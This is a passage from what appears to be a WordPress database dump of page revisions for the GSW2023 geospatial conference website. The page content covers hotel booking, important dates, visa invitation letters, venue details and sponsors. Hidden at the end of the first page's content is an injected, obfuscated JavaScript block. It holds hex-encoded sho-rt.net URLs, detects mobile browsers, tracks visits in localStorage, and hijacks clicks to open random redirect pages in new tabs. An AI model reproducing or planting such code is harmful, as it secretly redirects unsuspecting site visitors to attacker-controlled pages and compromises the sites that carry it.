awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<p><span style=\"color: #ffffff;\"><strong> </strong></span></p>\n<h5><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:22:40','2023-06-13 22:22:40','',3066,'https://gsw2023.com/?p=4686',0,'revision','',0),
(4687,1,'2023-06-13 22:25:33','2023-06-13 22:25:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" 